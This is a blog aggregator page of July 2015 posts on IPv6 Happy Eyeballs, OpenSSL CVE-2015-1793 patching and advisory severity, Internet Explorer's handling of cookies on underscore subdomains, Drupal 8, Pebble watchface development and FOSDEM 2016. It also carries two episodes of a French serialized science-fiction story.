Apple Favours IPv6, Gives IPv4 a 25ms Penalty

The post Apple Favours IPv6, Gives IPv4 a 25ms Penalty appeared first on ma.ttias.be.

This is pretty exciting news for the adoption of IPv6.

Last month, Apple announced that all iOS9 apps need to be "IPv6 compatible".

Because IPv6 support is so critical to ensuring your applications work across the world for every customer, we are making it an AppStore submission requirement, starting with iOS 9.

In this case, compatible just means the applications should implement the NSURLSession class (or a comparable alternative), which will translate DNS names to either AAAA (IPv6) or A (IPv4) records, depending on which one is available.

It doesn't mean the actual hostnames need to be IPv6. You can still have a IPv4-only application, as long as all your DNS-related system calls are done in a manner that would allow IPv6, if available.

But to further encourage IPv6 adoption, Apple has just motivated all its app developers to use IPv6 where applicable: IPv4 networks will get a 25ms penalty compared to IPv6 connections.

Apple implemented "Happy Eyeballs", an algorithm published by the IETF which can make dual-stack applications (those that understand both IPv4 and IPv6) more responsive to users, avoiding the usual problems faced by users with imperfect IPv6 connections or setups.

Since its introduction into the Mac OSX line 4 years ago, Apple has pushed a substantial change to the implementation for the next Mac OSX release "El Capitan".

1. Query the DNS resolver for A and AAAA.
If the DNS records are not in the cache, the requests are sent back to back on the wire, AAAA first.

2. If the first reply we get is AAAA, we send out the v6 SYN immediately

3. If the first reply we get is A and we're expecting a AAAA, we start a 25ms timer
-- If the timer fires, we send out the v4 SYN
-- If we get the AAAA during that 25ms window, we move on to address selection
[v6ops] Apple and IPv6 -- Happy Eyeballs

In other words: DNS calls are done in parallel, both for an AAAAA record as well as an A record. Before the answer of the A-record is accepted, at least 25ms should have passed waiting for a potential response to the AAAA query.

RFC6555, which describes the Happy Eyeballs algorithm, notes that Firefox and Chrome use a 300ms penalty timer.

1. Call getaddinfo(), which returns a list of IP addresses sorted by the host's address preference policy.

2. Initiate a connection attempt with the first address in that list (e.g., IPv6).

3. If that connection does not complete within a short period of time (Firefox and Chrome use 300 ms), initiate a connection attempt with the first address belonging to the other address family (e.g., IPv4).

4. The first connection that is established is used. The other connection is discarded.
RFC6555

Apple's implementation isn't as strict as Chrome's of Firefox's, but it is making a very conscious move to push for IPv6 adoption. I reckon it's good news for Belgian app developers, as we're leading the IPv6 adoption charts.

If you're interested, here are some IPv6 related blogposts I published a few years ago;

The post Apple Favours IPv6, Gives IPv4 a 25ms Penalty appeared first on ma.ttias.be.

by Mattias Geniar at July 13, 2015 06:49 PM

Lionel Dricot

Printeurs 33

16858527501_044b385d93_z
Ceci est le billet 33 sur 34 dans la série Printeurs

Nellio, Eva et Junior doivent quitter précipitamment l’appartement de Junior par l’escalier de secours. Ils sont interceptés par un drone que Junior désactive en sautant par dessus la rambarde avant de tomber dans le vide.

Tout cela s’est passé en une fraction de seconde mais, par réflexe, j’ai poussé Eva sur le sol grillagé avant de me précipiter à la balustrade. Au dernier moment, j’arrive à saisir un poignet de Junior.
— Aaaaah ! continue-t-il.
— Aaaaah ! répondis-je.
La rambarde me scie l’aisselle. Chaque mouvement de Junior m’inflige une douleur insupportable. Mes doigts commençant à faiblir, je tends mon autre bras.
— Attrape ma main !
— Bordel ! Ça fait mal !
Il grimace tout en tentant d’agripper mon poignet.
— Ça te fait mal ? Étrange, moi j’adore, fais-je sans déserrer les dents.
— C’était plus facile avec l’avatar !

D’un coup de reins, je parviens à le hisser. D’une main, il s’agrippe à la rambarde contre laquelle je m’arc-boute. L’attrapant par le caleçon, je le balance d’une manière fort peu élégante à côté d’Eva sur le plancher métallique de notre palier. Nous nous retrouvons tous les trois couchés, hors d’haleine.
— Je croyais que tu faisais ça à l’entrainement, fais-je haletant.
— Ben oui… Mais c’est la première fois que je le fais sans avatar.
Il regarde ses mains écorchées.
— Bordel, ça fait mal ! Et ces bras sont d’une faiblesse. Sans compter ce cœur qui est maintenant tout palpitant. Quel corps biologique de merde !
Je me relève tout en tentant de reprendre un rythme respiratoire normal.
— Peut-être, mais c’est le seul disponible pour le moment. Et comme je viens de risquer ma peau pour le sauver, ce corps biologique de merde, t’as intérêt à en prendre soin !

Sans prendre le temps de nous resaisir, nous reprenons la descente. J’essaye de me concentrer sur notre problème immédiat : comment interpréter le message que m’a envoyé Max ? Ce AA-ZZ quelque chose ? J’espère que Junior l’a bien noté !

Mais, très vite, hypnotisés par le décompte régulier des marches, mes yeux se fixent sur les murs entièrement nus qui nous entourent. Où que porte mon regard, je ne vois qu’uniformité. Aucune couleur. Aucune décoration. Il me faut plusieurs minutes avant de réaliser que je ne perçois le monde de cette façon que depuis que j’ai retiré mes lentilles. Auparavant, les publicités, les animations ou les simples indications concourraient à rendre l’espace vivant, changeant. Mes pensées étaient sans cesse interrompues par une nouveauté quelconque.

Depuis que j’ai dénudé mes pupilles, le monde est devenu hideux, terrifiant. Je suis devenu un rebelle traqué, je dois lutter à chaque seconde pour survivre.

Est-ce uniquement le monde extérieur ? Ne plus avoir de lentilles m’offre une lucidité nouvelle quand à ce que je suis, ce que je pense être, ce qui me motive et ce qui me paralyse. Peut-être que cette vision est encore plus effrayante que les façades lépreuses et tristes.

Cette descente introspective me semble interminable. Le bruit métalliques des marches devient insoutenable, je lutte mécaniquement pour ne pas ralentir. Un profond soupir de soulagement s’échappe de mes lèvres au moment où mes pieds foulent le sol de la ruelle. J’ai cru ne jamais y arriver !
Afin de ne pas éveiller l’attention des drones, nous commençons à nous éloigner de la manière la plus naturelle possible. Eva marche comme un somnambule et je me contente de la guider d’une pression sur l’avant bras.
— Où va-t-on ? me demande Junior.
— Un endroit calme pour réfléchir au message qu’on vient de recevoir.
Tout en continuant à avancer, il me tend un morceau de papier toilette sur lequel je déchiffre « A12-ZZ74 000-000 » en lettres brunâtres. Je ne peux réprimer une moue de dégoût.
— Beurk ! Tu l’as vraiment écrit avec ta… ton… ?
Junior éclate de rire en pointant une petite cicatrice rouge sur son front.
— Non, je ne devais pas. Alors j’ai gratté un bouton. Je préférais écrire avec du sang.
— Étrange comme le fait de savoir que c’est du sang et pas de la merde me soulage, souligné-je sans ironie.
— Par contre, je ne vois pas du tout ce que ça pourrait être. Il s’agit certainement des coordonnées d’un point de rendez-vous suivies de coordonnées temporelles. Mais je ne vois pas comment les déchiffrer. Parle moi un peu de Max. Quel genre de type est-ce ? Quel indice te donnerait-il pour le retrouver ?

Max. Son souvenir est étrange, brumeux. Il y a l’individu monstrueux, blessé qui m’a aidé, qui a disparu, qui n’est plus qu’un amalgame de chair et de métal.
— Mais comment s’est-il blessé ?
Je lui raconte alors notre entrevue dans son appartement, notre conversation et la manière dont il m’a confié l’accès à un chan IRC où je pouvais demander de l’aide à FatNerdz.
— C’est d’ailleurs suite à cette expérience que je considère ton appartement comme condamné.

Junior s’arrête brutalement avant de se taper le poing dans le plat de la main.
— Mais oui, c’est évident !
Je le regarde étonné.
— L’intertube ! Il n’est officiellement pas encore en service mais est disponible dans une bonne partie de la ville. Les coordonnées correspondent, j’avais étudié la possibilité de l’utiliser pour déplacer les avatars. Le 0000-0000 signifie « livraison immédiate sans temporisation aux nœuds redistributeurs ». J’aurais du m’en douter !
— Bien joué. Mais comment déterminer l’emplacement du terminal A12-ZZ74 ?
— Il n’y a qu’une seule manière de le savoir, fait-il avec un clin d’œil avant de continuer :
— Par contre, j’ai peur que Georges Farreck intercepte le message et en comprenne le sens.
— Ces coordonnées m’ont été transmises via un message privé crypté sur un nœud Tor2. Il saura très vite que j’ai reçu un message de Max mais ça va lui prendre un temps certain avant d’en déchiffrer le contenu. Probablement plusieurs jours.

Junior se frappe subitement le front du plat de la main.
— Merde, j’ai oublié de verrouiller l’écran de ma tablette et d’encrypter la mémoire ! Ils pourront retrouver facilement le message en fouillant l’appartement.

Une explosion se fait soudain entendre derrière nous. Le souffle nous précipite sur le sol, des éclats de verre se mettent à tomber comme de dangereux flocons de neige.
— Qu’est-ce que c’est ? demande Junior.
Je lève la tête et aperçoit un nuage de fumée là où, quelques minutes plus tôt, nous étions encore en train de discuter calmement.
— Ton appartement !
— Hein ? Tu veux dire que…
— Qu’il ne faut pas s’inquiéter pour ta tablette, ces andouilles viennent de régler le problème eux-même.

 

Photo par TintedLens-Photo.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at July 13, 2015 03:38 PM

Dries Buytaert

Acquia announces it is ready for Drupal 8

I'm excited to announce that starting today, Acquia is announcing we're ready to fully support our customers with Drupal 8. This means our professional services, our support, our product engineering, our cloud services … the entire company is ready to help anyone with Drupal 8 starting today.

While Drupal 8 is not yet released (as it has always been said, Drupal 8 will be "ready when it's ready"), the list of release blockers is dwindling ever closer to zero, and a beta-to-beta upgrade path will soon be provided in core. These factors, along with Acquia's amazing team of more than 150 Drupal experts (including a dedicated Drupal 8 engineering team that has contributed to fixing more than 1,200 Drupal 8 issues), gives us full confidence that we can make our customers successful with Drupal 8 starting today.

In the process of working with customers on their Drupal 8 projects, we will contribute Drupal 8 core patches, port modules, help improve Drupal 8's performance and more.

I'm excited about this milestone, as Drupal 8 will be a truly ground-breaking release. I'm most excited about the architectural enhancements that strongly position Drupal 8 for what I've called the Big reverse of the Web. For the web to reach its full potential, it will go through a massive re-platforming. From Flipboard to the upcoming release of Apple News, it's clear that the web is advancing into the “post-browser” era, where more and more content is "pushed" to you by smart aggregators. In this world, the traditional end-point of the browser and website become less relevant, requiring a new approach that increases the importance of structured content, metadata and advanced caching. With Drupal 8, we've built an API-driven architecture that is well suited to this new “content as a service” approach, and Drupal 8 is ahead of competitive offerings that still treat content as pages. Check out my DrupalCon Los Angeles keynote for more details.

by Dries at July 13, 2015 01:02 PM

July 11, 2015

Lionel Dricot

Printeurs sur Wattpad

7008333501_f599f8f4aa_z

TL;DR: Printeurs est désormais disponible sur Wattpad. Suivez-moi sur cette plateforme et commencez votre lecture.

 

Il y a plus de deux ans, je m’interrogeais sur le futur du livre et l’édition. J’imaginais une plateforme où n’importe qui pourrait publier des séries, des romans, des articles, une plateforme qui abolirait la frontière entre lecteurs et auteurs. Deux ans plus tard, la plateforme qui semble avoir le plus de succès sur ce créneau est sans conteste Wattpad.

Encore peu connu chez les adultes « sérieux », Wattpad, dédié entièrement à l’écriture et à la lecture, semble rencontrer son plus grand succès… chez les adolescents. Ceux dont on dit qu’ils ne lisent pas, qu’ils n’ont pas de culture. Sur Wattpad, les adolescents se déchaînent, écrivent des kilomètres de fan-fictions, lisent, commentent, critiquent le style d’un texte.

Testé et recommandé par les blogauteurs Greg, Alias, Neil Jomunsi et analysé par Thierry Crouzet, qui y voit le contraire d’un blog, j’avoue être très en retard pour le train Wattpad.

Alors, certes, Wattpad est plein de défaut : il affiche des pubs si on n’a pas installé Adblock, il ne permet pas de rémunérer les auteurs, il n’est pas lisible sur ma liseuse Kobo (un énorme frein en ce qui me concerne). Dois-je pour autant l’éviter à tout prix ?

Au même moment, je constate que je ne progresse pas aussi vite que je le voudrais sur ma série Printeurs et que je n’arrive pas à terminer le dernier chapitre de l’Écume du temps. Pourtant, l’écriture de ces romans me procure un plaisir autrement plus important que celle d’un billet de blog. Mais je perçois un frein, une gêne.

Et si ce frein c’était tout simplement le fait que je n’utilise pas le bon outil ? Comme le théorise très bien Thierry Crouzet dans La mécanique du texte, l’outil façonne autant que l’auteur. Et l’outil ne se limite pas au clavier ou au stylo, il représente toute la chaine entre l’auteur et son lectorat. Ne suis-je pas en train d’essayer de sculpter du marbre avec un tournevis ?

Il est donc temps pour moi de tester ce nouvel outil et de vous annoncer l’arrivée de Printeurs sur Wattpad.

Pour les lecteurs, la recette est simple :

  1. Installez l’application Wattpad sur votre smartphone ou tablette (ou créez un compte via le site web).
  2. Suivez moi !
  3. Commencez à lire Printeurs.
  4. N’oubliez pas de voter pour chaque épisode.

Pourquoi voter ? Tout simplement car cela donne de la visibilité à l’histoire sur la plateforme Wattpad, cela attire de nouveaux lecteurs et, au final, cela peut être un incitant très fort à poster l’épisode suivant. Je fais donc l’expérience d’un pur chantage qui semble être la norme chez les utilisateurs de Wattpad : vous voulez la suite ? Votez !

Bonne lecture !

 

Remarque : je continuerai à publier les épisodes de Printeurs sur mon blog, par soucis d’uniformité. Mais l’expérience nous dira si cette approche vaut la peine d’être continuée.

Photo par Tim Hamilton.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at July 11, 2015 05:26 PM

July 09, 2015

Mattias Geniar

Rethinking Security Advisory Severities

The post Rethinking Security Advisory Severities appeared first on ma.ttias.be.

You're probably aware that the OpenSSL team disclosed a "high severity" vulnerability earlier today. You're probably aware, because the internet has been buzzing with anticipation, hype and fear that this was a new heartbleed.

Disclosing vulnerabilities

The OpenSSL team announced the upcoming patch of the vulnerability several days in advanced. It followed its security policy. I'm 100% in favor of this.

However, the current state of the OpenSSL security policy -- and other open source projects as well -- have a limited description of these severities.

For instance, the OpenSSL team has categorised this vulnerability as a high severity issue according to this description:

high severity issues: this includes issues affecting common configurations which are also likely to be exploitable. Examples include a server DoS, a significant leak of server memory, and remote code execution.

OpenSSL Security Policy

According to the above definition, this was indeed a high severity vulnerability. It was likely to be exploitable, given the latest release of the OpenSSL codebase.

However, hardly anyone uses the latest release of OpenSSL.

Hyping Security Disclosures

The Heartbleed vulnerability got the same severity as the one from last night. Heartbleed was a disaster, CVE-2015-1793 will probably go by unnoticed. It won't get a logo. It won't get a website. It won't get its own themesong.

Why? Because CVE-2015-1793, no matter how dangerous it was in theory, concerned code that only a very small portion of the OpenSSL users were using.

But pretty much every major technology site jumped on the OpenSSL advisory. Doomsdays scenarios were being created and hyped. It could be the next Heartbleed! What if it's a new Logjam? The Internet is doomed!

At this rate, the tech industry will actually become the boy who cried wolf.

Attention-seeking headlines draw more pageviews, more clicks and ultimately more revenue. It's all the fault of online advertising.

Adding context to announcements

The announcement of forthcoming security releases were vague with details. That's obviously intentional.

The OpenSSL team is in a particularly tricky situation, though. On the one hand, their advisories are meant to warn people without giving away the real vulnerability. It's a warning sign, so everyone can keep resources at hand for quick patching, should it be needed.

At the same time, they need to warn their users of the actual severity. Publishing false advisories discredits them entirely [1].

And while the OpenSSL team can make an educated guess as to which versions of the library are most used, they cannot know for sure. If some company is embedding OpenSSL onto their devices and kept it all quiet, this recent vulnerability may have been a disaster for them.

So what's there to do?

Client/Server, Affected installs, Likelihood of exploit

Here's the part where it gets very dangerous. I'm about to make suggestions on what additional information could be safely disclosed, without giving away the actual vulnerability.

There may just be a practical limit here, where it's absolutely not feasible to do. In which case, it's probably just best to stick to the current security policy, vague as it is, and let the internet regulate themselves.

Depending on your work or interest area, you may be more suspicious of server than client vulnerabilities. Heartbleed was an obvious server nightmare, whereas CVE-2015-1793 only affects the client-side of applications [2]. At the same time, if the vulnerable version of OpenSSL was used in web browsers, it would have been a disaster nonetheless.

Open question #1: should the announcement mention if it's a client- or server side bug?

A lot of Linux distributions and applications (Apache2, Nginx, OpenSSH) use OpenSSL. This is publicly known. The OpenSSL crew is undoubtably aware of this. This puts them in a position to take into account the install-base of the openssl libraries whose code is vulnerable.

A vulnerability in openssl 1.0.1e (Red Hat 6.x and 7.x) or 0.9.8e (Red Hat 5.x) is going to be a lot more severe than a vulnerability in code that was just released a month ago and hasn't been adopted by distributions yet.

Open question #2: should the announcement mention the potential impacted installations?

Both questions play a vital role in determining the actual severity of a vulnerability. Yet at the same time, an advisory cannot tell exactly which versions will be affected nor can it describe the platforms that will need to install patches, since it risks giving away too much information for anyone out looking for the bug.

I'm not sure if there is a proper solution to this problem, but I'm hoping the next security advisory -- wether it's from OpenSSL, Xen, Red Hat or any other player out there -- does whatever it can to make the actual severity as clear as possible.

Doing so would reduce unnecessary hype and fear and could eventually spare a lot of (human) resources from being unnecessarily scheduled or reserved.

[1] Don't let this get into a flame war of LibreSSL vs OpenSSL vs BoringSSL, please. ;-)
[2] 'Client' is used in the broad sense, since any web application can consume an SSL/TLS stream or endpoint and act as a client on its own.

The post Rethinking Security Advisory Severities appeared first on ma.ttias.be.

by Mattias Geniar at July 09, 2015 09:07 PM

OpenSSL CVE-2015-1793: Man-in-the-Middle Attack

The post OpenSSL CVE-2015-1793: Man-in-the-Middle Attack appeared first on ma.ttias.be.

As announced at the beginning of this week, OpenSSL has released the fix for CVE-2015-1793.

These releases will be made available on 9th July. They will fix a single security defect classified as "high" severity. This defect does not affect the 1.0.0 or 0.9.8 releases.
Forthcoming OpenSSL releases

More details and how to patch can be found below.

openssl

High Severity Patch

The patch is considered a high severity patch. The details are as follows, as published by the OpenSSL team.

During certificate verification, OpenSSL (starting from version 1.0.1n and 1.0.2b) will attempt to find an alternative certificate chain if the first attempt to build such a chain fails.

An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and "issue" an invalid certificate.
OpenSSL Security Advisory [9 Jul 2015]

This kind of vulnerability allows man-in-the-middle attacks and could cause applications to see invalid and untrusted SSL certificates as valid. It essentially allows everyone to be come their own Certificate Authority (CA).

The bug is fixed in commit aae41f8c54257d9fa6904d3a9aa09c5db6cefd0d.

openssl_cve_2015_1793

And in commit 2aacec8f4a5ba1b365620a7b17fcce311ada93ad.

openssl_cve_2015_1793_2

Pretty damn serious, indeed. That means it's patching time again.

The "upside" is that it only affects a limited set of OpenSSL versions: OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o.

Which versions & operating systems are affected?

The vulnerability appears to exist only in OpenSSL releases that happened in June 2015 and later. That leaves a lot of Linux distributions relatively safe, since they haven't gotten an OpenSSL update in a while.

Red Hat, CentOS and Ubuntu appear to be entirely unaffected by this vulnerability, since they had no OpenSSL updates since June 2015.

As confirmed by Red Hat 's announcement:

The OpenSSL project has published information about an important vulnerability (CVE-2015-1793) affecting openssl versions 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c. These upstream versions have only been available for a month, and given Red Hat's policy of performing careful backports of important bug fixes and selected features, this functionality is not present in any version of OpenSSL shipped in any Red Hat product.

No Red Hat products are affected by this flaw (CVE-2015-1793), so no actions need to be performed to fix or mitigate this issue in any way.
OpenSSL Security Fix of July 9th 2015 (CVE-2015-1793)

Just to be on the safe side, check for package updates and apply them ASAP if they're available. Especially if you have software that uses the latest OpenSSL source code or alternative repositories.

How to patch

As usual (ref: heartbleed, CVE-2015-0291 and CVE-2015-0286) with OpenSSL patches, it's a 2-step fix. First, update the library on your OS.

$ yum update openssl

or

$ apt-get update
$ apt-get install openssl

Then, find all services that depend on the OpenSSL libraries, and restart them.

$ lsof | grep libssl | awk '{print $1}' | sort | uniq

Since the attack is a man-in-the-middle attack, it's advised to restart any service or application that communicates to a remote SSL/TLS endpoint.

If anyone manages to change either the DNS of your endpoint or modify the endpoint URL altogether, and point it to their own servers, your application may still accept it as a valid SSL/TLS stream.

The post OpenSSL CVE-2015-1793: Man-in-the-Middle Attack appeared first on ma.ttias.be.

by Mattias Geniar at July 09, 2015 12:56 PM

July 08, 2015

Mattias Geniar

Why Internet Explorer Won’t Allow Cookies On (sub)domains With Underscores

The post Why Internet Explorer Won’t Allow Cookies On (sub)domains With Underscores appeared first on ma.ttias.be.

Debugging this issue cost me some time today. Enough that I'll never forget how IE handles cookies on (sub)domains that contain underscores.

In hindsight, it seems obvious. In fact, there's even an Internet Explorer FAQ that describes how IE should react when it's presented with a domain or subdomain that contains underscores. Except at the time, I had no idea this was even related.

My Problem

My problem was that session cookies in PHP would work in Chrome and Firefox, but just refuse to work in Internet Explorer. Even the very latest version of IE, Internet Explorer 11. It's the kind of bug that appears to be by design and will stick around until the end of IE times.

Maybe Project Spartan aka Microsoft Edge will change this ancient behaviour?

What Is This Bug Of Which You Speak?

If the domain or subdomain your web application is running on contains an underscore, Internet Explorer will refuse to store cookies. Any kind of cookie. From session cookies to persistent cookies. Your webserver will reply with a Set-Cookie header and the client will happily ignore it.

This kind of domain name works: something.domain.tld
This kind of domain does not: some_thing.domain.tld

If you're working with sessions and session cookies, that's a problem. Every page refresh, the client responds with an empty Cookie: header so the server generates a new Set-Cookie header on every request.

Cookies just don't work in IE if your (sub)domain contains an underscore.

What's The Cause?

According to Microsoft, this behaviour was introduced with kb316112. It's a Windows patch designed to resolve CVE MS01-055, which dates back to 2001.

It's a cookie vulnerability. From 2001. For which we still experience the consequences.

The original CVE fixed this particular problem:

This patch eliminates three vulnerabilities affecting Internet Explorer. The first involves how IE handles URLs that include dotless IP addresses.

If a web site were specified using a dotless IP format (e.g., http://031713501415 rather than http://207.46.131.13), and the request were malformed in a particular way, IE would not recognize that the site was an Internet site. Instead, it would treat the site as an intranet site, and open pages on the site in the Intranet Zone rather than the correct zone.

This would allow the site to run with fewer security restrictions than appropriate.
MS01-051

So why does the fix for that CVE still affect us today?

As part of the fix in kb316112, Microsoft introduced stricter validation for domain names in DNS. That essentially means all domain names must follow the DNS RFC. Its origin dates back to RFC606 (1973) and RFC608 (1974).

Guess what the original DNS syntax does not contain? That's right: underscores.

So Microsoft started preventing cookies on anything that contains invalid DNS characters.

Security patch MS01-055 prevents servers with improper name syntax from setting cookies names. Domains that use cookies must use only alphanumeric characters ("-" or ".") in the domain name and the server name.

Internet Explorer blocks cookies from a server if the server name contains other characters, such as an underscore character ("_").
Security Patch MS01-055

Here's where I think they went wrong, though.

Underscores are indeed not allowed in host names, but they are allowed in domain names. The difference is the interpretation of a "host name" vs. a "domain name".

RFC2181, published in 1997, clearly states this.

The DNS itself places only one restriction on the particular labels that can be used to identify resource records. That one restriction relates to the length of the label and the full name. [...]

Implementations of the DNS protocols must not place any restrictions on the labels that can be used. In particular, DNS servers must not refuse to serve a zone because it contains labels that might not be acceptable to some DNS client programs.

RFC2181

To me, it seems like Microsoft introduced a wrong kind of validation and mixed host names with domain names.

So How Do I Fix It?

Just send a Pull Request to the IE11 codebase with the fix!

Well, since that's obviously not an option, there really is no alternative but to avoid underscores in your (sub)domains on the internet. This can be especially annoying for auto-generated subdomains (where I experienced it), where underscores could accidentally be introduced and break things in unexpected ways, for IE users.

For the future, I hope Microsoft reviews this policy of setting cookies on domains that include an underscore. Maybe they're correct in following the RFC & standards (although this is debatable), but they're the only browser that appears to be doing so.

At what point should you abandon principle and instead follow the masses in adopting non-standard practices?

The post Why Internet Explorer Won’t Allow Cookies On (sub)domains With Underscores appeared first on ma.ttias.be.

by Mattias Geniar at July 08, 2015 08:38 PM

Xavier Mertens

$HOME Sweet $HOME

Nest-ThreatYesterday, I talked at RMLL (“Rencontres Mondiales du Logiciel Libre“) or LSM in English (“Libre Sofware Meeting“) held in Beauvais, France. The presentation title was “$HOME Sweet $HOME” and covered the security of our home networks regarding the invasion of connected gadgets also known as the Internet of Things. I gave some tips & tricks to improve your security when you connect such devices on your network.

The slides are online and the talk was recorded. The video should be available soon on video.rmll.info.

by Xavier at July 08, 2015 07:48 AM

Kristof Willen

Spiro

Programming

Even more Pebble adventures ! Now that Skylines was thriving in the Pebble appstore, I decided to generate a watchface for the new Pebble Time, so I had something to show off when my Pebble Time will arrive in August. And what better app could I implement than some colorfull spirographs ?

It took quite a while to finish this : as I didn't had my Pebble Time yet, I had no real hardware to test the app, so I had to rely solely on the Pebble emulator on my computer. Eventually, I came up with a first version which I published on the appstore. However, soon, different people remarked that the app was slow and crash prone. Turned out the app used quite some sine/cosine functions which were the cause of all those slowdowns. Hard to believe that my 20 year old HP pocket calculator was more powerfull than a wearable with a modern ARM chipset !

So it was clear I couldn't use sine/cosine functions. Pebble had a workaround in the SDK with sin_lookup functions which use a precalculated table to come up with this. However, this was mostly oriented to create the movement of analogue watches, and the generated values didn't make any sense to me. So I quickly programmed my own co/sine lookup table, and used the default hypotrochoids equations. This worked a lot better & quicker, but this needed also a lot of iterations to come up with a decent spirograph. And in some cases, the spirograph turned into gibberish. More debugging revealed that this was to events coming in when the Pebble was generating the spirograph, like the flick_wrist_to_update option I added to the watchface.

So eventually, I turned to the default Pebble SDK co/sine_lookup functions, and implemented my own hypotrochoids equations with it. This time, all worked well without any glitches. The result is Spiro, a colorfull watchface for the Pebble Time, and the original Pebble (only in B&W off course)..

by kristof at July 08, 2015 06:28 AM

Skylines

Programming

Now that my Pebble NMBS app is wrapped up, I decided to have a look at the SDK2 for Pebble, and build a watchface for it. I didn't need to search long for some inspiration for a new watchface : on the Moto360, someone made clever use of the black horizontal bezel at the bottom of the screen, adding some scenery to it, as if it was some shadow (default was a man sitting on a bench in the park). So I took the skyline of Prague, converted it to B&W, and I got my first watchface, which I called Skylines.

The app has been extended currently with skylines up to 30 cities from all over the world. I also included a random mode, where the skyline changes every two hours. Just like you're on a world trip ! I also added a Night mode, where the screen inverts and a beautifull night sky appears between 8pm and 6am.

All in all, programming in C went quite well, considering I didn't touched C during the last 20 years. Only problem was the implementation of the configuration window, which was a bit of a hassle. Turned out I defined my app as SDK3 compatible, which seemed the cause of the errors.

by kristof at July 08, 2015 06:11 AM

July 07, 2015

FOSDEM organizers

Next FOSDEM: 30 & 31 January 2016

FOSDEM 2016 will take place at ULB Campus Solbosch on Saturday 30 and Sunday 31 January 2016. Further details and calls for participation will be announced in the coming weeks and months. Have a nice summer!

July 07, 2015 03:00 PM

July 06, 2015

Lionel Dricot

Printeurs 32

143632128_931f695dcf_z
Ceci est le billet 32 sur 34 dans la série Printeurs

En se connectant à un avatar, Nellio a gagné le laboratoire où il a lancé l’impression du contenu de sa carte mémoire. Eva semble hystérique et hurle. Reprenant le contrôle de la situation, Junior Freeman a injecté un sédatif à Eva avant de déconnecter Nellio et de l’envoyer dans un avatar hors d’usage.

— Nellio ? Nellio ? Nellio, réveille-toi !

J’ouvre brutalement les yeux et me redresse. J’ai le sentiment de naître, de m’extraire du néant. Où suis-je ? Quand suis-je ? Quel est mon passé ? Je suis complètement désorienté, je ne trouve aucun souvenir auquel me raccrocher. Un visage flou coiffé d’une broussaille rousse se penche sur moi.

— Désolé Nellio ! Mais je n’avais pas le temps de discuter. Je t’ai transféré dans un avatar hors d’usage afin que tu ne puisses pas faire de dégâts.

Avatar ? Dégâts ? Lentement les pièces du puzzle se remettent en place.
— Où… où sommes-nous ?
— Chez moi, dans mon appartement. Mais nous n’avons guère de temps à perdre. Mes collègues vont très vite comprendre ce qui s’est passé.
— Mais… comment sommes-nous ici ?

Du doigt, il me désigne un avatar qui se tient debout dans l’embrasure de la porte d’entrée, immobilisé dans une position grotesque.
— J’ai amené ta copine ici avec l’avatar avant de partir chercher nos deux corps au commissariat et de programmer une déconnexion différée. J’ai été un peu optimiste, je me suis fait éjecter de l’avatar à peine le pas de la porte franchie. Je me suis connecté à mon corps biologique alors qu’il était en pleine chute vers le plancher. Je te raconte pas l’atterrissage…
Il me montre des ecchymoses sur les coudes. Le brouillard qui m’engourdit le cerveau se dissipe petit à petit.
— Ma copine ? Quel cop… Eva !
— Ne t’inquiète pas, elle dort paisiblement et va se réveiller d’un instant à l’autre.
Tournant la tête, j’aperçois le corps d’Eva reposant paisiblement sur un vieux canapé en plastique souple. Junior l’a bordé d’une vieille couverture. Doucement, je m’approche et lui caresse les cheveux. Sa respiration se fait plus rapide, ses yeux s’entrouvre et une sorte de cri étouffé commence à jaillir de sa bouche. La prenant dans mes bras, je fais de mon mieux pour la rassurer. Elle articule avec peine.
— Nel… lio ?

Junior me tend un gobelet d’eau que je porte à ses lèvres. Eva tente de boire mais, comme un enfant, ne semble pas comprendre comment utiliser ses lèvres. Sa déglutition est saccadée, comme désynchronisée. L’eau ruisselle sur son visage et inonde la couverture.

— Je vais lui prêter des vêtements, continue Junior. Et puis il faudra filer. Nous avons très peu de temps. Nous allons devoir nous barbouiller de maquillage anti-reco et trouver une planque.

Il se tourne brutalement vers moi.

— T’imagines ? Tu débarques dans ma petite vie peinard et, quelques heures plus tard, je suis un criminel recherché. Je devrais t’en vouloir mais, honnêtement, je ne me suis jamais autant marré. C’est vachement excitant ! Surtout que maintenant on va continuer sans avatar, dans un simple corps biologique. Sacré challenge !

Tout en me décrochant un grand éclat de rire, il se met à me lancer des t-shirts trop larges et des vêtements peu seyants.
— C’est parfait, ça va casser la reconnaissance de silhouette des drones. Ce sont de vieilles loques, aucune puce ou fonction électronique intégrée. Par contre, je n’ai aucune idée de où nous pourrions nous réfugier.
— Tentons de mettre un peu d’ordre dans nos idées, raisonné-je. Quel est l’objectif de Georges Farreck dans cette histoire ? S’il voulait me supprimer, il aurait déjà pu le faire. S’il ne l’a pas fait c’est que je lui suis encore indispensable pour mettre en place les printeurs. Il n’a donc pas tous les éléments.
– Cela expliquerait la relative facilité avec laquelle j’ai pu m’échapper : les policiers ont l’ordre de ne pas te tuer !
— Il a perdu Eva, il ne veut pas me perdre moi, cela se tient. Mais son comportement reste étrange.
— Ok, mais on fait quoi maintenant ? C’est le plus important !

Je réfléchis un instant.
— Junior, t’es prêt à sacrifier ton appartement ? À ne plus y revenir ?
— Ben je pense que c’est déjà le cas, je suis grillé ! Je t’avoue que, de toutes façons, en tant qu’unité spéciale ma vie était surtout au commissariat.
— Donne moi une tablette avec une connexion vers un nœud Tor2.

Il attrape un fin écran et me le tend. Pianotant rapidement, je me connecte à IRC. Impossible de me souvenir du nom du chan que Max m’avait recommandé, une longue série de caractères hexadécimaux, mais je me rappelle très bien du serveur sur lequel se connecter. En quelques secondes, je crée un compte et rejoint le chan public le plus fréquenté.

« Max, FatNerdz : Eva a perdu la clé du wifi de maman. Merci de me l’envoyer en MP. »

Junior me regarde avec un air interrogatif.
— Mais qu’est-ce que cela signifie ?
